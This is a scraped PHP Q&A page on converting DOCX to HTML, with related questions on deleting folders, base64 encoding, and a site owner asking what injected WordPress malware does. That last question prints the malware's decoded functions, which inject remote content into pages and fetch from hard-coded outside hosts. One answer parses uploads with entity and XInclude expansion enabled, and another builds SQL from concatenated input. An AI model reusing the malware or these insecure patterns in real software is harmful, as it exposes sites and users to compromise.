How can I convert a docx document to html using php? - php

I want to be able to upload an MS Word document and publish it as a page on my site.
Is there any way to accomplish this?

//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string (loadXML must be called on an instance, not statically)
// Skip errors and warnings; LIBXML_NONET blocks network access while parsing an uploaded file
$xml = new DOMDocument();
$xml->loadXML($data, LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
return strip_tags($xml->saveXML());
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument both ship with PHP (ZipArchive needs the zip extension enabled), so you don't need to install, include, or require additional libraries.
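The function above returns one undifferentiated string, because strip_tags() discards paragraph boundaries. As a minimal sketch of the next step, the following walks the w:p paragraphs with DOMXPath and emits one <p> per paragraph. The function name docxXmlToHtml is hypothetical, its input is assumed to be the word/document.xml string already read from the archive, and paragraphs inside tables are not covered.

```php
<?php
// Hypothetical helper (not part of the answer above): turn the raw
// word/document.xml string into plain HTML paragraphs.
function docxXmlToHtml(string $documentXml): string
{
    $dom = new DOMDocument();
    // LIBXML_NONET keeps the parser from fetching anything over the network.
    if (!@$dom->loadXML($documentXml, LIBXML_NONET)) {
        return '';
    }

    $xpath = new DOMXPath($dom);
    $xpath->registerNamespace(
        'w',
        'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
    );

    $html = '';
    // Only top-level body paragraphs; tables are skipped in this sketch.
    foreach ($xpath->query('//w:body/w:p') as $paragraph) {
        $text = '';
        foreach ($xpath->query('.//w:t', $paragraph) as $textNode) {
            $text .= $textNode->textContent;
        }
        if ($text !== '') {
            $html .= '<p>' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . "</p>\n";
        }
    }
    return $html;
}
```

Escaping with htmlspecialchars() matters here because the document text comes from an uploaded file and ends up in a page.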

One may use PHPDocX.
It has support for practically all HTML CSS styles. Moreover you may use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML.
The HTML methods of PHPDocX also allow for the direct use of Word styles. You may use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
This makes all your tables use the MediumGrid3-accent5 Word style. The embedHTML method, as well as its template version (replaceTemplateVariableByHTML), preserves inheritance, meaning that you may use a predefined Word style and override any of its properties with CSS.
You may also extract selected parts of your HTML using 'JQuery type' selectors.

You can convert Word docx documents to HTML using the Print2flash library. Here is a PHP excerpt from my client's site which converts a document to HTML:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts the document whose path is given in the $wordfile variable to an HTML page file given by the $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file, together with a fuller sample, from the Print2flash SDK.

This is a workaround based on David Lin's answer above.
Removing "w:" from a docx's XML tags leaves behind HTML-like tags:
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
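Stripping the "w:" prefix yields tag names such as p, r and t, which browsers do not treat as formatting. A sketch of an explicit mapping, assuming only bold, italic and underline run properties matter, could look like this. The names W_NS, runToHtml and formattedParagraphsToHtml are illustrative, not from the answer above.

```php
<?php
const W_NS = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main';

// Hypothetical helper: render a single <w:r> run as inline HTML.
function runToHtml(DOMElement $run, DOMXPath $xpath): string
{
    $text = '';
    foreach ($xpath->query('w:t', $run) as $t) {
        $text .= $t->textContent;
    }
    $html = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    // A toggle property is "on" when present, unless w:val switches it off.
    $isOn = function (string $name) use ($run, $xpath): bool {
        $node = $xpath->query('w:rPr/w:' . $name, $run)->item(0);
        if (!$node instanceof DOMElement) {
            return false;
        }
        $val = $node->getAttributeNS(W_NS, 'val');
        return !in_array($val, ['0', 'false', 'off', 'none'], true);
    };

    if ($isOn('b')) { $html = '<strong>' . $html . '</strong>'; }
    if ($isOn('i')) { $html = '<em>' . $html . '</em>'; }
    if ($isOn('u')) { $html = '<u>' . $html . '</u>'; }
    return $html;
}

// Hypothetical helper: convert document.xml into <p> elements with inline formatting.
function formattedParagraphsToHtml(string $documentXml): string
{
    $dom = new DOMDocument();
    if (!@$dom->loadXML($documentXml, LIBXML_NONET)) {
        return '';
    }
    $xpath = new DOMXPath($dom);
    $xpath->registerNamespace('w', W_NS);

    $html = '';
    foreach ($xpath->query('//w:body/w:p') as $p) {
        $inner = '';
        foreach ($xpath->query('w:r', $p) as $run) {
            $inner .= runToHtml($run, $xpath);
        }
        $html .= '<p>' . $inner . "</p>\n";
    }
    return $html;
}
```

Runs nested inside hyperlinks or other wrappers are ignored by this sketch, since it only looks at direct w:r children of each paragraph.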

OK, I'm very late, but I thought I'd post this to save you all some time.
This is some PHP code I put together to read not just the text from a docx but the images too. It does not yet support floating images or text, but it is a big step forward from what has already been posted here. Note that you need to change https://example.co.uk to YOUR domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->saveimgpath . '/' . $imagename;
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
//push style to the array of styles (only for w:style nodes, so $ws_def is always defined here)
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode->nodeName, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process text alignment
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "text-align:justify;"; // w:jc "both" means justified text
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
// w:before / w:after are in twentieths of a point; a missing attribute counts as 0
$battr = $prchildnode->attributes->getNamedItem('before');
$bval = $battr ? (int)$battr->nodeValue : 0;
$pitem->innerstyle .= "padding-top:" . ($bval / 20) . "pt;";
$aattr = $prchildnode->attributes->getNamedItem('after');
$aval = $aattr ? (int)$aattr->nodeValue : 0;
$pitem->innerstyle .= "padding-bottom:" . ($aval / 20) . "pt;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode->nodeName, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "font-weight: bold;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "font-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . ($sz / 2) . 'pt;'; // w:sz is in half-points
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
if (strpos($imgpathdef->extractedpath, $rel->Target) !== false)
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . ($sz / 2) . 'pt;'; // w:sz is in half-points
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>
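Word stores sizes in units that differ from CSS: drawing extents are in EMUs (914400 per inch, which is where the 9525 divisor above comes from at 96 DPI), w:sz is in half-points, and w:spacing values are in twentieths of a point. A small sketch of the conversions follows. The helper names are hypothetical and the 96 DPI default is an assumption about the target page.

```php
<?php
const EMU_PER_INCH = 914400;

// Hypothetical helper: drawing extent (cx / cy) in EMUs to CSS pixels.
function emuToPx(int $emu, int $dpi = 96): float
{
    return $emu * $dpi / EMU_PER_INCH;
}

// Hypothetical helper: w:sz value (half-points) to points.
function halfPointsToPt(int $halfPoints): float
{
    return $halfPoints / 2;
}

// Hypothetical helper: w:spacing before/after (twentieths of a point) to points.
function twipsToPt(int $twips): float
{
    return $twips / 20;
}
```

For example, a w:sz of 24 corresponds to 12pt text, so writing the raw value as a pixel size would roughly double or otherwise distort the intended size.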

Related

Glitches in code for deleting a folder after the zip is made

I have the code below.
It first creates a dynamic folder with a name like v3_12-02-2012-12873547839. Then it creates a subfolder called "image" and saves some JPEG images in it. Then it creates a CSV file and puts it in "v3_12-02-2012-12873547839".
Finally it creates a zip file in the project folder named "v3_12-02-2012-12873547839.zip".
function create_csv($version,$ctg,$cnt,$nt,$api)
{
$folder = $version."-".date('d-m-Y')."-".time();
if(!file_exists('./'.$folder))
{
mkdir('./'.$folder);
mkdir('./'.$folder.'/image/');
}
$cnt_table = "aw_countries_".$version;
$ctg_table = "aw_categories_".$version;
$off_table = "aw_offers_".$version;
$sizeof_ctg = count($ctg);
$cond_ctg = " ( ";
for($c = 0; $c < $sizeof_ctg ; $c++)
{
$cond_ctg = $cond_ctg." $ctg_table.category = '".$ctg[$c]."' ";
if($c < intval($sizeof_ctg-1))
$cond_ctg = $cond_ctg." OR ";
else if($c == intval($sizeof_ctg-1))
$cond_ctg = $cond_ctg." ) ";
}
$sizeof_cnt = count($cnt);
$cond_cnt = " ( ";
for($cn = 0; $cn < $sizeof_cnt ; $cn++)
{
$cond_cnt = $cond_cnt." $cnt_table.country = '".$cnt[$cn]."' ";
if($cn < intval($sizeof_cnt-1))
$cond_cnt = $cond_cnt." OR ";
else if($cn == intval($sizeof_cnt-1))
$cond_cnt = $cond_cnt." ) ";
}
$sizeof_nt = count($nt);
$cond_nt = " ( ";
for($n = 0; $n < $sizeof_nt ; $n++)
{
$cond_nt = $cond_nt." $off_table.network_id = '".$nt[$n]."' ";
if($n < intval($sizeof_nt-1))
$cond_nt = $cond_nt." OR ";
else if($n == intval($sizeof_nt-1))
$cond_nt = $cond_nt." ) ";
}
$sizeof_api = count($api);
$cond_api = " ( ";
for($a = 0; $a < $sizeof_api ; $a++)
{
$cond_api = $cond_api." $off_table.api_key = '".$api[$a]."' ";
if($a < intval($sizeof_api-1))
$cond_api = $cond_api." OR ";
else if($a == intval($sizeof_api-1))
$cond_api = $cond_api." ) ";
}
$output = "";
$sql = "SELECT DISTINCT $off_table.id,$off_table.name
FROM $off_table,$cnt_table,$ctg_table
WHERE $off_table.id = $cnt_table.id
AND $off_table.id = $ctg_table.id
AND ".$cond_api."
AND ".$cond_nt."
AND ".$cond_cnt."
AND ".$cond_ctg;
$result = mysql_query($sql);
$columns_total = mysql_num_fields($result);
for ($i = 0; $i < $columns_total; $i++)
{
$heading = mysql_field_name($result, $i);
$output .= '"'.$heading.'",';
}
$output .= '"icon"';
$output .="\n";
while ($row = mysql_fetch_array($result))
{
for ($i = 0; $i < $columns_total; $i++)
{
$output .='"'.$row["$i"].'",';
}
$sql_icon = "SELECT $off_table.icon FROM $off_table WHERE id = '".$row['id']."'";
$result_icon = mysql_query($sql_icon);
while($row_icon = mysql_fetch_array($result_icon))
{
$image = $row_icon["icon"];
$id = $row["id"];
$icon = "./$folder/image/{$id}.jpg";
$icon_link = "$folder/image/{$id}.jpg";
file_put_contents($icon, $image);
}
$output .= '"'.$icon_link.'"';
$output .="\n";
}
$filename = "myFile.csv";
$fd = fopen ( "./$folder/$filename", "w");
fputs($fd, $output);
fclose($fd);
$source = $folder;
$destination = $folder.'.zip';
$flag = '';
if (!extension_loaded('zip') || !file_exists($source)) {
return false;
}
$zip = new ZipArchive();
if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
return false;
}
$source = str_replace('\\', '/', $source);
if($flag)
{
$flag = basename($source) . '/';
}
if (is_dir($source) === true)
{
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file)
{
if (strpos($flag.$file,$source) !== false) { // this will add only the folder we want to add in zip
if (is_dir($file) === true)
{
}
else if (is_file($file) === true)
{
$zip->addFromString(str_replace($source . '/', '', $flag.$file), file_get_contents($file));
}
}
}
}
else if (is_file($source) === true)
{
$zip->addFromString($flag.basename($source), file_get_contents($source));
}
$zip->close();
if (is_dir($folder))
{
$objects = scandir($folder);
foreach ($objects as $object)
{
if ($object != "." && $object != "..")
{
if (filetype($folder."/".$object) == "dir")
{
$object_inner = scandir($folder."/".$object);
foreach ($object_inner as $object_inner)
{
if ($object_inner != "." && $object_inner != "..")
{
unlink($folder."/".$object."/".$object_inner);
}
}
rmdir($folder."/".$object);
}
else
unlink($folder."/".$object);
}
}
reset($objects);
}
rmdir("./".$folder);
}
Now the problem is, when I am trying to delete the folder, the folder somehow doesn't seem to delete, though I can recursively delete all its contents. Even though the folder becomes empty at the end, it doesn't get deleted.
Error I am getting:
Warning: rmdir(./v3-02-12-2014-1417512727): Permission denied in C:\xampp\htdocs\projecthas2offer\appwall_dev\frontend\ajax.php on line 265
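The ZipArchive and RecursiveIteratorIterator instances are still alive at that point and may still hold open handles on your directory, which on Windows can make rmdir() fail with "Permission denied". Free them with unset( $zip, $files ); before deleting the folder.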
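As a minimal sketch of that advice, the cleanup can be isolated in a helper that deletes children first and drops its own iterator before removing the root. The name removeDirectory is hypothetical, and the sketch assumes the caller has already run $zip->close() and unset($zip, $files) on the objects created while zipping.

```php
<?php
// Hypothetical helper: recursively delete a directory tree.
function removeDirectory(string $dir): bool
{
    if (!is_dir($dir)) {
        return false;
    }

    // CHILD_FIRST yields files and subfolders before their parent folder.
    $items = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST
    );

    foreach ($items as $item) {
        if ($item->isDir() && !$item->isLink()) {
            rmdir($item->getPathname());
        } else {
            unlink($item->getPathname());
        }
    }

    // Release the iterator so no directory handle stays open on the root.
    unset($items, $item);

    return rmdir($dir);
}
```

In the function from the question, this would replace the nested scandir() loops: call $zip->close(), then unset($zip, $files), then removeDirectory($folder).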

Why base64_encode() return null

I have a 22 MB docx file and want to encode it using PHP's base64_encode() function, but it always returns NULL. Is there a file size limit or some other condition for this function? My code:
$handle = fopen($fullpathfile, "rb");
$imagestr = base64_encode(fread($handle, filesize($fullpathfile)));
fclose($handle);
Try this code, which reads and encodes the file piece by piece instead of all at once:
$fh = fopen($fullpathfile, 'rb');
$cache = '';
$eof = false;
while (1) {
if (!$eof) {
if (!feof($fh)) {
$row = fgets($fh, 4096);
} else {
$row = '';
$eof = true;
}
}
if ($cache !== '')
$row = $cache.$row;
elseif ($eof)
break;
$b64 = base64_encode($row);
$put = '';
if (strlen($b64) < 76) {
if ($eof) {
$put = $b64."\n";
$cache = '';
} else {
$cache = $row;
}
} elseif (strlen($b64) > 76) {
do {
$put .= substr($b64, 0, 76)."\n";
$b64 = substr($b64, 76);
} while (strlen($b64) > 76);
$cache = base64_decode($b64);
} else {
if (!$eof && $b64[75] == '=') {
$cache = $row;
} else {
$put = $b64."\n";
$cache = '';
}
}
if ($put !== '') {
echo $put;
}
}
fclose($fh);
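A shorter way to get the same effect, sketched here under the assumption that memory pressure is what makes the one-shot call fail, is to encode in chunks whose size is a multiple of 57 bytes. 57 raw bytes encode to exactly 76 base64 characters, so every chunk ends on a line boundary and padding only appears at the very end. The function name base64EncodeStream and its parameters are illustrative.

```php
<?php
// Hypothetical helper: base64-encode everything from $in to $out in
// 76-character lines, holding only one chunk in memory at a time.
function base64EncodeStream($in, $out, int $linesPerChunk = 1024): void
{
    $chunkBytes = 57 * $linesPerChunk; // multiple of 3, so no mid-stream padding
    $buffer = '';

    while (!feof($in)) {
        $data = fread($in, $chunkBytes);
        if ($data === false) {
            break; // read error: stop rather than loop forever
        }
        $buffer .= $data;

        // Encode only full chunks; short reads stay buffered.
        while (strlen($buffer) >= $chunkBytes) {
            $piece = substr($buffer, 0, $chunkBytes);
            fwrite($out, chunk_split(base64_encode($piece), 76, "\n"));
            $buffer = substr($buffer, $chunkBytes);
        }
    }

    // Whatever is left is the final, possibly padded, piece.
    if ($buffer !== '') {
        fwrite($out, chunk_split(base64_encode($buffer), 76, "\n"));
    }
}
```

Usage would be along the lines of opening $fullpathfile with fopen($fullpathfile, 'rb') as $in and passing fopen('php://output', 'wb') or a target file as $out.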

What exactly does this PHP exploit code (found on my app)?

I've found this base64-encoded code in all the PHP files of one of my clients' sites (WordPress) and I'm trying to understand what it does.
I'm also trying to figure out whether it was an application exploit or direct FTP access that planted this code.
Everything starts with setup_globals_777() and ob_start('mrobh') setting the callback to the mrobh($content) function.
Then there is a call to gzdecodeit($decode), where the trouble starts.
It seems to get the page content and change it. Now I'm trying to detect the specific changes and understand all the functions, including the second one, gzdecodeit().
Can someone shed some light on it?
The calls
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
The callback:
function mrobh ($content)
{
@Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
$decoded_content);
} else {
return $decoded_content . gml_777();
}
}
The setup function (understandable)
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
@mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
The first function called after the callback execution:
Here is where the magic happens. I can't see the calls for the other
available functions and understand what this function is actually
decoding, since the $decode var is the application output grabbed by
the ob_start()
function gzdecodeit ($decode)
{
$t = @ord(@substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = @unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = @strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = @gzinflate(@substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
All the available functions (after a base64_decode()):
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (! function_exists('mrobh')) {
function get_tds_777 ($url)
{
$content = "";
$content = @trycurl_777($url);
if ($content !== false)
return $content;
$content = @tryfile_777($url);
if ($content !== false)
return $content;
$content = @tryfopen_777($url);
if ($content !== false)
return $content;
$content = @tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = @trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777 ($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777 ($url)
{
